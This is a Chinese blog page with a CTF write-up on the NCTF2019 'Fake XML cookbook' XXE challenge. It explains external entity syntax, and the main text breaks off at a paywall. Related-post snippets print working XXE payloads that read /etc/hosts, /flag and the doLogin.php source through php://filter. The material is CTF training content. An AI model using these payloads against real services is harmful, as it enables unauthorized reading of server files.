[NCTF2019]Fake XML cookbook 1

最新推荐文章于 2025-05-04 15:38:22 发布

原创

最新推荐文章于 2025-05-04 15:38:22 发布 · 2.1k 阅读

1 ·

CC 4.0 BY-SA版权

文章标签：

#xml #web安全 #安全

本文深入探讨了XML外部实体注入（XXE）漏洞的原理，指出当应用程序在处理XML输入时未能阻止外部实体加载，可能导致文件读取、命令执行等安全风险。通过示例代码展示了XXE漏洞触发的场景，并提醒开发者注意在允许XML上传的地方进行有效过滤，以防止恶意XML文件的上传。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

知识点：XML实体注入漏洞（XXE）

原理：XXE漏洞发生在应用程序解析XML输入时，没有禁止外部实体的加载，导致可加载恶意外部文件，造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可以上传xml文件的位置，没有对上传的xml文件进行过滤，导致可上传恶意xml文件。

详细了解

查看源代码，访问doLogin.php
在这里插入图片描述
访问doLogin.php,提示加载外部xml实体

DOCTYPE（文档类型定义的声明）
ENTITY（实体的声明）
SYSTEM、PUBLIC（外部资源申请）

内部实体
<!ENTITY 实体名称 "实体的值">

外部实体
<!ENTITY 实体名称 SYSTEM "URL">

因为本题是要外部实体加载，所以用下面一个

<?xml version = "1

最低0.47元/天解锁文章

200万优质内容无限畅学

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

succ3

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

XXE漏洞与CTF题目

m0_62725813的博客

12-09

803

典型的XXE攻击是由XML声明：<?DTD部分(通过特殊的命令去其他文件读取信息)SYSTEMXML部分组成危害：XXE 可以通过dtd去读取，访问其他文件或者网站，类似于ssrf">]> DTD部分</scan> XML部分scan标签设置一个test的实体，这个实体是通过system命令访问1.txt构造payload>//XML声明">]>

【学习笔记 46】 buu [NCTF2019]Fake XML cookbook

weixin_43553654的博客

08-03

465

0x00 知识点 XXE攻击 0x01 知识点详解什么是XXE攻击？答： XXE漏洞全称XML External Entity Injection即xml外部实体注入漏洞，XXE漏洞发生在应用程序解析XML输入时，没有禁止外部实体的加载，导致可加载恶意外部文件，造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可以上传xml文件的位置，没有对上传的xml文件进行过滤，导致可上传恶意xml文件。这里有一篇大佬的博客可以学习学习 0x02 解题思路

参与评论您还未登录，请先登录后发表或查看评论

buuctf-[NCTF2019]Fake XML cookbook(小宇特详解)

小宇的web博客

02-18

4536

buuctf-[NCTF2019]Fake XML cookbook(小宇特详解) 这里先看题乍一看像是sql注入，但是题目提示了是xml，这里就不考虑sql注入了。先抓包看一下这里的X-Requested-With提示了XML 然后发送到了doLogin.php 这里先讲一下XML的相关知识 XXE的危害和SSRF的有点像 XXE=>XML外部实体注入（被各种后端脚本调用） XML=>像html，html的目的是显示数据，但是xml的目的是传输数据，他没有预定义，他是纯文本，他是不会

BUUCTF——Fake XML cookbook

最新发布

weixin_71914594的博客

05-04

634

那就直接构造payload找flag。先弱口令万能密码试一下吧。弱口令和万能密码都失败了。成功读取passwd。

[NCTF2019]Fake XML cookbook1

kw741951的博客

08-03

632

猜测可能为sql注入，或者绕过，思路查看源码，看有用信息。

[ctf web]XXE通过DTD读取文件+XML和DTD基础语法（以[ctfshow]web_ak4观心和[NCTF2019]Fake XML cookbook为例）

ShenZ的博客

08-23

818

XML基础 XML文件可以分为三部分： XML声明 <?xml version ="1.0" encoding="UTF-8"?> DTD文档定义类型。文档元素 <foo><note category="COOKING"></note></foo> 根元素foo，子元素note，属性category XML语法 XML被设计为传输和存储数据基本语法： - 所有 XML 元素都须有关闭标签。 - XML 标签对大小写敏感。 - X

【xxe主看这个吧】xml --xxe 各种注入学习也就一些基本的方法，再加一个 xxe盲注，vps外带的

Zero_Adam的博客

04-10

504

目录：一、基础知识：二、注入方法：1. 直接通过DTD外部实体声明2. 通过DTD文档引入外部DTD文档，再引入外部实体声明3. 通过DTD外部实体声明引入外部实体声明三、产生的危害：1. 读取任意文件2. XXE无回显使用vps外带一、基础知识：基础看这篇就好二、注入方法： 1. 直接通过DTD外部实体声明内部实体声明，应该是无法触发xxe漏洞的，所以我们用的应该都是外部实体声明。也就是 SYSTEM 后面的东西都是外部的url的东西？。。不是呀，这个应该就不影响了，只是 system 后面的

web buuctf [NCTF2019]Fake XML cookbook1

weixin_44214568的博客

03-31

763

考点:XXE(XML External Entity Injection 即XML外部实体注入) 1.界面随便填入信息，进行抓包 2.分析请求头，有x-requests-with，可以知道请求是ajax请求（ajax 全名asyncjavascript and XML(异步JavaScript和XML)）也就是通过xml进行数据传输 https://xz.aliyun.com/t/6887#toc-0 抓包更改xml <?xml version="1.0" encoding..

[NCTF2019]Fake XML cookbook

weixin_55710577的博客

06-23

1919

[NCTF2019]Fake XML cookbook

XXE漏洞 [NCTF2019]Fake XML cookbook1

m0_75178803的博客

12-17

669

但是很明显这样是不行的，因为资源是在admin上，也就是用户名那里。发现我们post传入的数据都被放到了doLogin.php下面。提示加载外部xml实体。

## [NCTF2019]Fake XML cookbook### 1

sulide_moon的博客

05-08

213

前提：要了解xml外部实体注入和xpath注入攻击。实例文章：[从XML相关一步一步到XXE漏洞 - 先知社区 (aliyun.com)](https://xz.aliyun.com/t/6887?构造xpath注入语句，可以通过一直返回true来实现盲注获取xml文档的内容，逐级猜测服务端的信息。

buuctf [NCTF2019]True XML cookbook

01-20

### 关于BUUCTF NCTF2019 True XML cookbook 的解析 #### XXE漏洞利用基础 XML外部实体注入（XXE）是一种攻击方式，允许攻击者通过恶意构建的XML数据来访问服务器上的文件或其他资源。在NCTF2019中的`True XML cookbook`题目里，参与者需构造特定形式的XML输入以触发该漏洞并获取敏感信息。 #### 题目环境设置为了成功执行此挑战，参赛选手通常会遇到一个接受XML格式请求的应用程序接口。应用程序可能用于处理登录验证等功能，在这种情况下，它期望接收包含用户名和密码字段的有效负载[^1]。 #### 构造有效载荷Payload 针对此类问题的一个典型解决方案涉及创建自定义的DTD（文档类型定义），其中包含了指向目标系统的内部或外部实体声明。例如： ```xml <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE note [ <!ENTITY admin SYSTEM "file:///etc/hosts"> ]> <user> <username>&admin;</username> <password>1</password> </user> ``` 上述代码片段展示了如何定义名为`admin`的实体，并将其链接到本地文件系统路径`/etc/hosts`上；当这个XML被发送给存在缺陷的服务端应用时，如果服务端未正确过滤掉这些非法字符，则可能会返回所请求的内容作为响应的一部分[^4]。对于更复杂的场景，还可以尝试不同的URL方案来绕过某些防护机制，比如使用PHP过滤器读取远程脚本源码并编码成Base64字符串再传回客户端： ```xml <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE xxe [ <!ENTITY xee SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/html/doLogin.php"> ]> <user> <username>&xee;</username> <password>123123</password> </user> ``` 这段示例说明了怎样利用PHP特有的I/O流封装器(`php://`)去加载指定位置下的Web页面逻辑实现文件(doLogin.php)，并通过base64转换后反馈给提交者查看其具体内容[^3]。 #### 获取Flag的方法最终目的是找到隐藏在整个竞赛平台内的标志(flag)。根据已知条件调整前面提到的技术手段，可以将SYSTEM参数改为指向存储有flag文本的位置: ```xml <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE note [ <!ENTITY admin SYSTEM "file:///flag"> ]> <user> <username>&admin;</username> <password>123456</password> </user> ``` 一旦这样的请求被执行并且服务器确实暴露出预期的数据，那么就可以得到所需的标记信息完成比赛任务[^5]。